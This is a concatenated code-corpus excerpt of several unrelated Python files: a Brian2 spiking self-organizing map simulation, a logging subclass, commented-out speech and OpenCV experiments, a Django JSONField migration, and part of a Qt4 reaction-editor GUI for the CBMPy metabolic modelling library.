theta_reset_u = -0.5;
theta_reset_inh = -0.0;
theta_reset_som = 0.0
theta_u = 0.5;
theta_u_inh = 0.01;
theta_som = 0.8
# (B) Synaptic parameters, used in (2) and (3) for different synapse types
# temporal layer to som layer (u to v)
tau_r_afferent = 0.2 * ms;
tau_f_afferent = 1.0 * ms
# temporal layer (u to inh exc, u to inh inh, inh to u)
tau_r_exc = 0.4 * ms;
tau_f_exc = 2.0 * ms;
tau_r_inh = 0.2 * ms;
tau_f_inh = 1.0 * ms
tau_r_inh2u = 1.0 * ms;
tau_f_inh2u = 5.0 * ms
# som layer
tau_r_lateral = 0.1 * ms;
tau_f_lateral = 0.5 * ms
# (C) Maximum magnitudes of synaptic connection strength
w_syn_temporal_to_som_max = 2.2;
w_syn_u2inh_exc_max = 1.0;
w_syn_u2inh_inh_max = 1.0;
w_syn_inh2u_max = 100.0
w_syn_som_to_som_max = 1.0
# (D) Neighbourhood parameters, used in (6) and (7), for layer v (som)
a = 3.0;
b = 3.0;
X = 3.0;
X_ = 3.0
# (E) Learning parameter, used in (5)
# A_plus - Max synaptic strength, A_minus - max synaptic weakness; tau_plus, tau_minus - time constant of STDP
A_plus = 0.0016;
A_minus = 0.0055;
tau_plus = 11;
tau_minus = 10
# used in (7)
T = 10.0;
power_n = 2.0
# used in (6)
pi = np.pi
# size of the self-organizing map
map_size = 10
temporal_layer_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection to u layer
ds_inh2u/dt = (-s_inh2u)/tau_r_inh2u: 1
dw_inh2u/dt = (s_inh2u - w_inh2u)/tau_f_inh2u: 1
# membrane potential of u layer
dv/dt = (-v + I_ext - w_inh2u) / tau_m: 1
I_ext : 1
'''
inhibition_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection
# s_inh - internal variable
# w_inh - output potential
ds_inh/dt = (-s_inh)/tau_r_inh: 1
dw_inh/dt = (s_inh - w_inh)/tau_f_inh: 1
# excitation connection
# s_exc - internal variable
# w_exc - output potential
ds_exc/dt = (-s_exc)/tau_r_exc: 1
dw_exc/dt = (s_exc - w_exc)/tau_f_exc: 1
# diff equation membrane potential of inhibition neuron
dv/dt = (-v + w_exc - w_inh) / tau_m_inh: 1
'''
som_layer_neuron_equ = '''
dglobal_time/dt = 1 / ms : 1
dtime/dt = 1 / ms : 1
# Afferent connection (from temporal layer to som layer)
ds_afferent/dt = (-s_afferent)/tau_r_afferent: 1
dw_afferent/dt = (s_afferent - w_afferent)/tau_f_afferent: 1
# lateral connection
ds_lateral/dt = (-s_lateral)/tau_r_lateral: 1
dw_lateral/dt = (s_lateral - w_lateral)/tau_f_lateral: 1
# membrane potential of u layer
dv/dt = (-v + w_lateral + w_afferent) / tau_m_som: 1
'''
temporal_layer = NeuronGroup(N, temporal_layer_neuron_equ, threshold='v>theta_u', method=diff_method,
reset='''v = theta_reset_u; time = 0''')
# temporal_layer.I_ext = potential_input
# inhibition neuron
inhibition_neuron = NeuronGroup(1, inhibition_neuron_equ, threshold='v>theta_u_inh', method=diff_method,
reset='''v = theta_reset_inh; time = 0''')
# self-organizing layer
som_layer = NeuronGroup(map_size * map_size, som_layer_neuron_equ, threshold='v>theta_som', method=diff_method,
reset='''v = theta_reset_som; time = 0''')
# v to inh neuron, excitation connection
u2inh_excitation = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_exc += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_exc_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) ** time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_exc_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_excitation.connect(i=np.arange(N), j=0)
u2inh_excitation.w_syn = 'rand() * w_syn_u2inh_exc_max'
# v to inh neuron, inhibition connection
u2inh_inhibition = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_inh += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_inh_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_inh_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_inhibition.connect(i=np.arange(N), j=0)
u2inh_inhibition.w_syn = 'rand() * w_syn_u2inh_inh_max'
# inh neuron to v, inhibition connection
inh2u_inhibition = Synapses(inhibition_neuron, target=temporal_layer, method=diff_method,
on_pre='''
s_inh2u += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_inh2u_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_inh2u_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
inh2u_inhibition.connect(i=0, j=np.arange(N))
# inh2u_inhibition.w_syn = 'rand() * w_syn_inh2u_max'
inh2u_inhibition.w_syn = 0.5 * w_syn_inh2u_max
# som lateral connection
som_synapse = Synapses(som_layer, target=som_layer, method=diff_method,
on_pre='''
radius = X - (X - X_)/(1+(2**0.5 - 1)*((global_time/T)**(2 * power_n)))
y_pre = floor(i / map_size)
x_pre = i - y_pre * map_size
y_post = floor(j/map_size)
x_post = j - y_post * map_size
dist = (x_post - x_pre)**2 + (y_post - y_pre)**2
G1 = (1 + a) * exp(- dist/(radius**2)) / (2 * pi * radius**2)
G2 = a * exp(- dist/(b * radius)**2) / (2 * pi * (b * radius)**2)
w_syn = clip(G1 + G2, 0, w_syn_som_to_som_max)
s_lateral += w_syn
''',
on_post='''
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
''')
som_synapse.connect(condition='i!=j')
# som afferent connection
temporal_to_som_synapse = Synapses(temporal_layer, target=som_layer, method=diff_method,
on_pre='''
s_afferent += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_temporal_to_som_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_temporal_to_som_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
temporal_to_som_synapse.connect()
temporal_to_som_synapse.w_syn = np.random.randint(low=40000, high=60000, size=N*map_size*map_size) \
* w_syn_temporal_to_som_max / 100000.0
# Visualization
som_spike_mon = SpikeMonitor(som_layer)
u_spike_mon = SpikeMonitor(temporal_layer)
# u_state_mon_v = StateMonitor(temporal_layer, 'v', record=True)
# u_state_mon_time = StateMonitor(temporal_layer, 'time', record=True)
# u_state_mon_w = StateMonitor(temporal_layer, 'w_inh2u', record=True)
inh_spike_mon = SpikeMonitor(inhibition_neuron)
# inh_state_mon = StateMonitor(inhibition_neuron, 'v', record=True)
# w_exc_neu_state = StateMonitor(inhibition_neuron, 'w_exc', record=True)
# w_inh_neu_state = StateMonitor(inhibition_neuron, 'w_inh', record=True)
#
# w_syn_u2inh_exc = StateMonitor(u2inh_excitation, 'w_syn', record=True)
defaultclock.dt = time_step * ms
step = 2
plasticity_state = False
u2inh_excitation.plasticity = plasticity_state
u2inh_inhibition.plasticity = plasticity_state
inh2u_inhibition.plasticity = plasticity_state
temporal_to_som_synapse.plasticity = True # plasticity_state
# simulation_time = 200
# run(simulation_time * ms, report='text')
# weight visualization
# simulation
simulation_time = 50
attempts = 5
dataset = ArtificialDataSet(500, int(N/10))
dataset = dataset.generate_set()
np.savetxt('dataset.txt', dataset, delimiter=';')
plt.scatter(dataset[:, 0], dataset[:, 1], s=5)
plt.show()
net_model = Network(collect())
net_model.store()
for vector in dataset:
for it in range(attempts):
net_model.restore()
print("Input vector: {0}, attempt: {1}".format(vector, it))
potential_input = rf.float_to_membrane_potential(vector)
potential_input = potential_input.flatten()
temporal_layer.I_ext = potential_input
net_model.run(simulation_time * ms, report='text')
net_model.store()
# visual
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title="som")
win.resize(1000, 600)
win.setWindowTitle('brain')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
p1 = win.addPlot(title="Region Selection")
p1.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p1.showGrid(x=True, y=True)
lr = pg.LinearRegionItem([0, simulation_time])
lr.setZValue(0)
p1.addItem(lr)
p2 = win.addPlot(title="Zoom on selected region")
p2.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p2.showGrid(x=True, y=True)
def updatePlot():
p2.setXRange(*lr.getRegion(), padding=0)
def updateRegion():
lr.setRegion(p2.getViewBox().viewRange()[0])
lr.sigRegionChanged.connect(updatePlot)
p2.sigXRangeChanged.connect(updateRegion)
updatePlot()
win.nextRow()
p3 = win.addPlot(title="Region Selection")
p3.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p3.showGrid(x=True, y=True)
lr1 = pg.LinearRegionItem([0, 10])
lr1.setZValue(0)
p3.addItem(lr1)
p4 = win.addPlot(title="Zoom on selected region")
p4.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p4.showGrid(x=True, y=True)
def updatePlot2():
p4.setXRange(*lr1.getRegion(), padding=0)
def updateRegion2():
lr1.setRegion(p4.getViewBox().viewRange()[0])
lr1.sigRegionChanged.connect(updatePlot2)
p4.sigXRangeChanged.connect(updateRegion2)
updatePlot2()
u2som_syn_shape = temporal_to_som_synapse.w_syn[:].shape
picture = temporal_to_som_synapse.w_syn[:].reshape(N, int(u2som_syn_shape[0] / N))
np.savetxt('weights.txt', picture, delimiter=';')
win2 = QtGui.QMainWindow()
win2.resize(800, 800)
imv = pg.ImageView()
win2.setCentralWidget(imv)
win2.show()
win2.setWindowTitle("SOM weights")
imv.setImage(picture)
# subplot(421)
# # subplot(111)
# title("Temporal layer spikes")
# plot(u_spike_mon.t / ms, u_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, N + 1, 1))
#
# # show()
#
# subplot(422)
# title("Inhibition neuron spikes")
# plot(inh_spike_mon.t / ms, inh_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, 1, 1))
#
# subplot(423)
# title("u membrane potential")
# for item in u_state_mon_v:
# plot(u_state_mon_v.t / ms, item.v)
# # plot(u_state_mon_v.t / ms, u_state_mon_v[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(424)
# title("Inhibition neuron membrane potential")
# plot(inh_state_mon.t / ms, inh_state_mon[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(425)
# title("Excitation/inhibition interaction")
# plot(w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc, w_exc_neu_state.t / ms, w_inh_neu_state[0].w_inh,
# w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc - w_inh_neu_state[0].w_inh)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(426)
# title("Inhibition to u potential")
# plot(u_state_mon_w.t / ms, u_state_mon_w[0].w_inh2u)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(427)
# title("Synaptic Weight")
# for item in w_syn_u2inh_exc:
# plot(w_syn_u2inh_exc.t / ms, item.w_syn)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-0.1, 1.1, 0.1))
#
# subplot(428)
# title("Synaptic time pre spike")
# for item in u_state_mon_time:
# plot(w_syn_u2inh_exc.t / ms, item.time)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# show()
#
# # subplot(111)
# title("Som layer spikes")
# plot(som_spike_mon.t / ms, som_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, map_size * map_size + 1, 1))
#
# show()
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
mit
| 4,091,960,593,132,690,000 | 38.04 | 115 | 0.512942 | false | 3.164505 | false | false | false |
alexrudy/Cauldron
|
Cauldron/logger.py
|
1
|
1395
|
# -*- coding: utf-8 -*-
"""
A useful subclass of logger for more fine-grained messaging.
"""
import logging
import weakref
__all__ = ['KeywordMessageFilter']
class Logger(logging.getLoggerClass()):
"""A basic subclass of logger with some useful items."""
def getChild(self, suffix):
"""Get a child logger."""
return logging.getLogger("{0}.{1}".format(self.name, suffix))
def msg(self, msg, *args, **kwargs):
"""Messaging-level logging."""
if self.isEnabledFor(5):
self._log(5, msg, args, **kwargs)
def trace(self, msg, *args, **kwargs):
"""Trace-level logging."""
if self.isEnabledFor(1):
self._log(1, msg, args, **kwargs)
logging.setLoggerClass(Logger)
class KeywordMessageFilter(logging.Filter):
def __init__(self, keyword):
"""Filter using a keyword."""
logging.Filter.__init__(self)
self._keyword_name = keyword.full_name
self._keyword = weakref.ref(keyword)
def filter(self, record):
"""Filter by applying keyword names."""
record.keyword_name = self._keyword_name
keyword = self._keyword()
if keyword is not None:
record.keyword = repr(keyword)
else:
record.keyword = "<MissingKeyword '{0}'>".format(self._keyword_name)
return True
|
bsd-3-clause
| -8,061,825,739,172,878,000 | 26.92 | 80 | 0.581362 | false | 4.090909 | false | false | false |
sprtkd/OpenHmnD
|
object/tst.py
|
1
|
3754
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 09:29:01 2017
@author: Punyajoy Saha
"""
#!/usr/bin/env python
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
#
#import speech2
#
## say() speaks out loud.
#speech2.say("I am speaking out loud.")
#
## input() waits for user input. The prompt text is optional.
##spoken_text = speech2.input("Say something, user!")
##print ("You said: %s" % spoken_text)
#
## You can limit user input to a set of phrases.
#spoken_text = speech2.input("Are you there, user?", ["Yes", "No", "Shut up, computer."])
#print ("You said: %s" % spoken_text)
#
## If you don't want to wait for input, you can use listenfor() to run a callback
## every time a specific phrase is heard. Meanwhile your program can move on to other tasks.
#def L1callback(phrase, listener):
# print ("Heard the phrase: %s" % phrase)
## listenfor() returns a Listener object with islistening() and stoplistening() methods.
#listener1 = speech2.listenfor(["any of", "these will", "match"], L1callback)
#
## You can listen for multiple things at once, doing different things for each.
#def L2callback(phrase, listener):
# print ("Another phrase: %s" % phrase)
#listener2 = speech2.listenfor(["good morning Michael"], L2callback)
#
## If you don't have a specific set of phrases in mind, listenforanything() will
## run a callback every time anything is heard that doesn't match another Listener.
#def L3callback(phrase, listener):
# speech2.say(phrase) # repeat it back
# if phrase == "stop now please":
# # The listener returned by listenfor() and listenforanything()
# # is also passed to the callback.
# listener.stoplistening()
#listener3 = speech2.listenforanything(L3callback)
#
## All callbacks get automatically executed on a single separate thread.
## Meanwhile, you can just do whatever with your program, or sleep.
## As long as your main program is running code, Listeners will keep listening.
#
#import time
#while listener3.islistening(): # till "stop now please" is heard
# time.sleep(1)
#
#assert speech2.islistening() # to at least one thing
#print ("Dictation is now stopped. listeners 1 and 2 are still going.")
#
#listener1.stoplistening()
#print ("Now only listener 2 is going")
#
## Listen with listener2 for a while more, then turn it off.
#time.sleep(30)
#
#speech2.stoplistening() # stop all remaining listeners
#assert not speech2.islistening()
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#print ('item {\n'+' name: "my"'+' name: "my"')
#print (' name: "my"')
#print (' name: "my"')
#print ('}')
#
#import cv2
#import numpy as np
#import random
#roi=cv2.imread('img2.png')
#hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#cv2.imwrite('imghsv.png',hsv_roi)
#x_max=hsv_roi.shape[0]
#y_max=hsv_roi.shape[1]
#y_10=int(y_max/20)
#x_10=int(x_max/20)
#a=np.zeros((5,3),dtype='uint8')
#x=random.sample(range(int(x_max/2-20),int(x_max/2+20)),5)
#y=random.sample(range(int(y_max/2-10),int(y_max/2+10)),5)
#
#for i in range(0,a.shape[0]):
# a[i,0]=hsv_roi[int(x[i]),int(y[i]),0]
# a[i,1]=hsv_roi[int(x[i]),int(y[i]),1]
# a[i,2]=hsv_roi[int(x[i]),int(y[i]),2]
#max_0=np.max(a[:,0])
#max_1=np.max(a[:,1])
#max_2=np.max(a[:,2])
#min_0=np.min(a[:,0])
#min_1=np.min(a[:,1])
#min_2=np.min(a[:,2])
#
#
#mask = cv2.inRange(hsv_roi, np.array((min_0, min_1,min_2)), np.array((max_0,max_1,max_2)))
#cv2.imwrite('mask.png',mask)
#roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
#cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
#term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
|
mit
| 6,885,824,817,186,783,000 | 23.889655 | 93 | 0.641982 | false | 2.492696 | false | false | false |
jrief/djangocms-cascade
|
cmsplugin_cascade/migrations/0029_json_field.py
|
1
|
2323
|
# Generated by Django 3.1.5 on 2021-01-28 15:52
from django.db import migrations, models
def backwards(apps, schema_editor):
print("Migration backward will not restore your `JSONField`s to `CharField`s.")
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0028_cascade_clipboard'),
]
operations = [
migrations.AlterField(
model_name='cascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='cascadeclipboard',
name='data',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='cascadepage',
name='glossary',
field=models.JSONField(blank=True, default=dict, help_text='Store for arbitrary page data.'),
),
migrations.AlterField(
model_name='cascadepage',
name='settings',
field=models.JSONField(blank=True, default=dict, help_text='User editable settings for this page.'),
),
migrations.AlterField(
model_name='iconfont',
name='config_data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='inlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='pluginextrafields',
name='css_classes',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='pluginextrafields',
name='inline_styles',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sharedglossary',
name='glossary',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sortableinlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.RunPython(migrations.RunPython.noop, reverse_code=backwards),
]
|
mit
| -3,055,507,169,678,262,000 | 33.161765 | 112 | 0.587602 | false | 4.467308 | false | false | false |
SystemsBioinformatics/cbmpy
|
cbmpy/CBQt4.py
|
1
|
32405
|
"""
CBMPy: CBQt4 module
===================
Constraint Based Modelling in Python (http://pysces.sourceforge.net/getNewReaction)
Copyright (C) 2009-2018 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: [email protected]
Last edit: $Author: bgoli $ ($Id: CBQt4.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
#from __future__ import unicode_literals
import os
import time
import random
import math
import re
import webbrowser
import urllib2
from .CBCommon import pp_chemicalFormula
from .CBModel import Reaction as CBMReaction
HAVE_QT4 = False
try:
import PyQt4
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
HAVE_QT4 = True
print('Qt4 GUI tools available')
except ImportError as ex:
print('\nQt4 GUI tools not available.')
print(ex)
class ReactionCreator(QtGui.QWidget):
#_fba = None
_mlist = None
_rlist = None
_flist = None
_newSubs = None
_newProds = None
_fixColour = None
_errColour = None
_goodColour = None
_cfdict = None
_cndict = None
_ccdict = None
IGNORECHECK = False
ISBALANCED = True
NewReaction = None
_Blower = '-inf'
_Bupper = 'inf'
def __init__(self, rlist, mlist, flist, cfdict, cndict, ccdict):
super(ReactionCreator, self).__init__()
self.mousePos = self.cursor().pos()
rlist.sort()
mlist.sort()
flist.sort()
self._rlist = rlist
self._mlist = mlist
self._flist = flist
self._cfdict = cfdict
self._cndict = cndict
self._ccdict = ccdict
self._newSubs = []
self._newProds = []
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def addSubstrate(self, coeff, sid):
self.tblSub.insertRow(self.tblSubRow)
self.tblSub.setItem(self.tblSubRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblSub.setItem(self.tblSubRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblSub.item(self.tblSubRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblSub.item(self.tblSubRow, 1).setForeground(self._fixColour)
self.tblSub.item(self.tblSubRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblSubRow += 1
def addSelectedSubstrates(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstSub.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newSubs:
self.addSubstrate(1, i_)
self._newSubs.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Substrates(s) added')
self.checkBalance()
def addProduct(self, coeff, sid):
self.tblProd.insertRow(self.tblProdRow)
self.tblProd.setItem(self.tblProdRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblProd.setItem(self.tblProdRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblProd.item(self.tblProdRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblProd.item(self.tblProdRow, 1).setForeground(self._fixColour)
self.tblProd.item(self.tblProdRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblProdRow += 1
def addSelectedProducts(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstProd.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newProds:
self.addProduct(1, i_)
self._newProds.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Product(s) added')
self.checkBalance()
# def keyPressEvent(self, event):
#print('KeyPress key: {}'.format(str(event.key())))
# if event.key() == 16777223:
#print('You pressed the delete key')
def deleteSubstrates(self):
self.deleteReagents('substrate')
def deleteProducts(self):
self.deleteReagents('product')
def deleteAllSubstrates(self):
self.tblSub.clear()
for r_ in range(self.tblSubRow - 1, -1, -1):
self.tblSub.removeRow(r_)
self.tblSubRow = 0
self.checkBalance()
def deleteAllProducts(self):
self.tblProd.clear()
for r_ in range(self.tblProdRow - 1, -1, -1):
self.tblProd.removeRow(r_)
self.tblProdRow = 0
self.checkBalance()
def deleteReagents(self, reagentType):
selected = None
PRODACTIVE = False
SUBACTIVE = False
self.IGNORECHECK = True
if reagentType == 'substrate':
selected = [(it_.row(), it_.column()) for it_ in self.tblSub.selectedItems()]
SUBACTIVE = True
elif reagentType == 'product':
selected = [(it_.row(), it_.column()) for it_ in self.tblProd.selectedItems()]
PRODACTIVE = True
if selected != None:
deleteRow = []
if len(selected) == 2:
if selected[0][0] == selected[1][0]:
if selected[0][1] + 1 == selected[1][1]:
deleteRow.append(selected[0][0])
elif len(selected) > 2:
for it_ in range(0, len(selected), 2):
if selected[it_][1] == selected[it_ + 1][1]:
if selected[it_][0] + 1 == selected[it_ + 1][0]:
if selected[it_][0] not in deleteRow:
deleteRow.append(selected[it_][0])
if selected[it_][0] + 1 not in deleteRow:
deleteRow.append(selected[it_][0] + 1)
deleteRow.sort()
for d_ in range(len(deleteRow) - 1, -1, -1):
if SUBACTIVE:
print('Deleting Sub table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Substrate(s) deleted')
# print(self._newSubs)
#print(str(self.tblSub.item(d_, 1).text()))
self._newSubs.pop(self._newSubs.index(str(self.tblSub.item(d_, 1).text())))
self.tblSub.removeRow(deleteRow[d_])
self.tblSubRow -= 1
elif PRODACTIVE:
print('Deleting Prod table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Product(s) deleted')
# print(self._newProds)
#print(str(self.tblProd.item(d_, 1).text()))
self._newProds.pop(self._newProds.index(str(self.tblProd.item(d_, 1).text())))
self.tblProd.removeRow(deleteRow[d_])
self.tblProdRow -= 1
self.IGNORECHECK = False
self.checkBalance()
def checkBalance(self):
if self.IGNORECHECK:
return
output = {}
left = {}
right = {}
for r_ in range(self.tblSubRow):
sid = str(self.tblSub.item(r_, 1).text())
scoef = float(str(self.tblSub.item(r_, 0).text()))
# print scoef
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
output[e_[0]] = output[e_[0]] + -scoef * float(e_[1])
# print scoef*float(e_[1])
else:
output[e_[0]] = -scoef * float(e_[1])
# print scoef*float(e_[1])
if e_[0] in left:
left[e_[0]] = left[e_[0]] + scoef * float(e_[1])
else:
left[e_[0]] = scoef * float(e_[1])
for r_ in range(self.tblProdRow):
sid = str(self.tblProd.item(r_, 1).text())
pcoef = float(str(self.tblProd.item(r_, 0).text()))
# print pcoef, type(pcoef)
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
#print -pcoef*float(e_[1])
output[e_[0]] = output[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
output[e_[0]] = pcoef * float(e_[1])
if e_[0] in right:
#print -pcoef*float(e_[1])
right[e_[0]] = right[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
right[e_[0]] = pcoef * float(e_[1])
# print output
self.updateBalance(output, left, right)
# self.txtBal.setText(str(output))
def updateBalance(self, bdict, left, right):
colHead = []
keys = list(bdict)
if self.tblBalCol > 0:
for c_ in range(self.tblBalCol - 1, -1, -1):
self.tblBal.removeColumn(c_)
self.tblBalCol = 0
self.ISBALANCED = True
for k_ in range(len(keys)):
if not keys[k_] in left:
left[keys[k_]] = 'None'
if not keys[k_] in right:
right[keys[k_]] = 'None'
self.tblBalCol += 1
self.tblBal.insertColumn(k_)
self.tblBal.setItem(0, k_, QtGui.QTableWidgetItem('{}'.format(abs(bdict[keys[k_]]))))
self.tblBal.setItem(1, k_, QtGui.QTableWidgetItem('{}'.format(left[keys[k_]])))
self.tblBal.setItem(2, k_, QtGui.QTableWidgetItem('{}'.format(right[keys[k_]])))
self.tblBal.item(0, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if k_ == 0:
boldFont = self.tblBal.item(0, k_).font()
boldFont.setBold(True)
self.tblBal.item(0, k_).setFont(boldFont)
self.tblBal.item(1, k_).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblBal.item(2, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if bdict[keys[k_]] != 0.0:
self.ISBALANCED = False
self.tblBal.item(0, k_).setForeground(self._errColour)
else:
self.tblBal.item(0, k_).setForeground(self._goodColour)
self.tblBal.setHorizontalHeaderLabels(QtCore.QStringList(keys))
def showErrorMessage(self, errorMsg, title="Reaction Creator"):
QtGui.QMessageBox.critical(None, title,
errorMsg,
QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,
QtGui.QMessageBox.NoButton)
self.statusBar.showMessage(errorMsg)
def getNewReaction(self):
reversible = self.btReverse.isChecked()
if not reversible and self._Blower == '-inf':
self._Blower = 0.0
Id = str(self.txtId.toPlainText()).strip()
Name = str(self.txtNm.toPlainText()).strip()
if Id == 'NewReactionId':
print('\nWARNING: using default reaction id')
errorMsg = None
if Id == "":
errorMsg = 'Reaction ID must be specified.'
elif Id in self._rlist:
errorMsg = 'Reaction ID \"{}\" already exists.'.format(Id)
if errorMsg != None:
self.showErrorMessage(errorMsg)
